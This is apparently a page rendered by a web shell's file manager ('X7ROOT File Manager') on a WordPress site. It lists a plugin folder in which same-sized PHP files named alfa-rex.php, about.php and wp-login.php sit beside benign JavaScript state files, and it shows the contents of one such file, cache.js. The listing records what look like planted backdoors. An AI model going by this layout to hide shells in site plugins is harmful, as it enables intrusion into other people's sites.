X7ROOT File Manager
Current Path:
/home/okeydcqc/okagallery.com/wp-content/plugins/extendify/src/Library/state
home
/
okeydcqc
/
okagallery.com
/
wp-content
/
plugins
/
extendify
/
src
/
Library
/
state
/
ðŸ“
..
📄
.htaccess
(356 B)
📄
about.php
(6.47 KB)
📄
about.php7
(6.47 KB)
📄
alfa-rex.php
(6.47 KB)
📄
alfa-rex.php56
(6.47 KB)
📄
alfa-rex.php7
(6.47 KB)
📄
alfa-rex.php8
(6.47 KB)
📄
cache.js
(299 B)
📄
global.js
(482 B)
📄
site.js
(1.11 KB)
📄
user.js
(899 B)
📄
wp-login.php
(6.47 KB)
Editing: cache.js
import { create } from 'zustand'; import { persist } from 'zustand/middleware'; export const useCacheStore = create( persist( (set) => ({ categories: [], setCategories: (categories) => set({ categories }), }), { name: `extendify-library-cache-${window.extSharedData.siteId}` }, ), );
Upload File
Create Folder